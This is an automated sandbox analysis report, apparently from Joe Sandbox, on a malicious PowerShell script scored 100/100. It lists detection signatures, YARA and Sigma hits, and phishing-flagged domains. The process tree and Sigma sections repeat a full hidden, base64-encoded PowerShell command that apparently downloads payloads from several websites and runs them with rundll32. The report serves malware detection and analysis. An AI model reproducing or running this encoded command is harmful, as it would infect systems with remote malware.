Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report ps_script.ps1

Overview

General Information

Sample Name:ps_script.ps1
Analysis ID:416466
MD5:afce2bf94f95c17bc64535f2a70a96d0
SHA1:eb88e2f97a2292d63d678963813a1999f69faa45
SHA256:9edaa045dc625024afee6ac6fd532fdb27d6beb607588c326babdba0b439d602
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Encrypted powershell cmdline option found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Very long command line found
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Non Interactive PowerShell
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • powershell.exe (PID: 5496 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\ps_script.ps1' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5344 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZwBpACcAKwAnAC0AYgBpAG4AJwArACcALwBTACcAKQArACgAJwAvACcAKwAnAEAAJwArACcAXQBhAG4AdwAnACkAKwAoACcAWwAzACcAKwAnADoALwAvACcAKwAnAGUAdABkAG8AZwAuAGMAbwAnACsAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGMAbwAnACkAKwAnAG4AdAAnACsAKAAnAGUAJwArACcAbgB0ACcAKQArACgAJwAvAG4AJwArACcAdQAvAEAAJwApACsAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKQArACcAcwAnACsAKAAnADoALwAvACcAKwAnAHcAdwB3ACcAKwAnAC4AaABpAG4AdAB1ACcAKwAnAHAALgBjACcAKQArACgAJwBvACcAKwAnAG0ALgAnACkAKwAoACcAYgAnACsAJwByAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGMAbwAnACkAKwAoACcAbgAnACsAJwB0AGUAbgAnACkAKwAoACcAdAAnACsAJwAvAGQARQAvACcAKwAnAEAAXQBhACcAKwAnAG4AdwBbADMAOgAvAC8AJwArACcAdwB3AHcALgAnACkAKwAnAHMAJwArACgAJwB0AG0AJwArACcAYQByAG8AdQBuAHMAJwArACcALgAnACkAKwAoACcAbgBzACcAKwAnAHcAJwApACsAKAAnAC4AJwArACcAZQBkAHUALgBhAHUALwBwACcAKwAnAGEAJwArACcAeQAnACsAJwBwAGEAbAAvAGIAOAAnACkAKwAoACcARwAnACsAJwAvAEAAXQAnACkAKwAoACcAYQAnACsAJwBuAHcAWwAnACkAKwAoACcAMwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAdwBtAC4AbQBjAGQAZQB2AGUAJwArACcAbABvAHAALgBuAGUAdAAnACsAJwAvACcAKwAnAGMAJwArACcAbwBuACcAKwAnAHQAJwArACcAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAJwA2ACcAKwAoACcARgAyACcAKwAnAGcAZAAvACcAKQApAC4AIgBSAEUAYABwAGAAbABBAEMAZQAiACgAKAAoACcAXQBhACcAKwAnAG4AJwApACsAKAAnAHcAJwArACcAWwAzACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAFAATABJAFQAIgAoACQAQwA4ADMAUgAgACsAIAAkAEMAdgBtAG0AcQA0AG8AIAArACAAJABGADEAMABRACkAOwAkAFEANQAyAE0APQAoACcAUAAnACsAKAAnADAAJwArACcANQBLACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABCAG0ANQBwAHcANgB6ACAAaQBuACAAJABCADkAZgBoAGIAeQB2ACkAewB0AHIAeQB7ACgAJgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABTAHkAcwBUAGUAbQAuAG4ARQB0AC4AVwBFAEIAYwBMAEkAZQBOAFQAKQAuACIAZABvAGAAVwBOAGwAYABPAGEARABgAEYASQBsAEUAIgAoACQAQgBtADUAcAB3ADYAegAsACAAJABJAG0AZAAxAHkAYwBrACkAOwAkAFoAMQAwAEwAPQAoACcAQQA5ACcAKwAnADIAUQAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQASQBtAGQAMQB5AGMAawApAC4AIgBsAGUAbgBgAEcAYABUAEgAIgAgAC0AZwBlACAAMwA1ADYAOQA4ACkAIAB7ACYAKAAnAHIAJwArACcAdQBuAGQAbAAnACsAJwBsADMAMgAnACkAIAAkAEkAbQBkADEAeQBjAGsALAAoACgAJwBDAG8AJwArACcAbgB0ACcAKQArACcAcgAnACsAKAAnAG8AbAAnACsAJwBfAFIAdQBuAEQAJwArACcATAAnACkAKwAnAEwAJwApAC4AIgBUAGAATwBTAHQAYABSAGkATgBHACIAKAApADsAJABSADYANQBJAD0AKAAnAFoAJwArACgAJwAwADkAJwArACcAQgAnACkAKQA7AGIAcgBlAGEAawA7ACQASwA3AF8ASAA9ACgAJwBGADEAJwArACcAMgBVACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwA1ADQASQA9ACgAKAAnAFYAOQAnACsAJwA1ACcAKQArACcATwAnACkA MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
ps_script.ps1PowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x0:$s1: POwersheLL

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.333177973.00000199B1C5D000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x524:$s1: POwersheLL
  • 0x7704:$s1: POwersheLL
  • 0x7944:$s1: POwersheLL
  • 0x79b4:$s1: POwersheLL
  • 0x7b84:$s1: POwersheLL
  • 0x7c2c:$s1: POwersheLL
00000000.00000002.333520412.00000199C97A3000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x2036:$s1: powershell
  • 0x2a30:$s1: POwersheLL
  • 0x2036:$sr1: powershell
  • 0x2036:$sn1: powershell
00000000.00000003.328991391.00000199C97A3000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x2036:$s1: powershell
  • 0x2a30:$s1: POwersheLL
  • 0x2036:$sr1: powershell
  • 0x2036:$sn1: powershell

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
Source: Process startedAuthor: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZwBpACcAKwAn
Sigma detected: Suspicious PowerShell Parameter SubstringShow sources
Source: Process startedAuthor: Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZwBpACcAKwAn
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZwBpACcAKwAn

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: ps_script.ps1Avira: detected
Antivirus detection for URL or domainShow sources
Source: http://www.hintup.com.brAvira URL Cloud: Label: phishing
Source: http://etdog.com/index.php/2020/12/03/faqAvira URL Cloud: Label: phishing
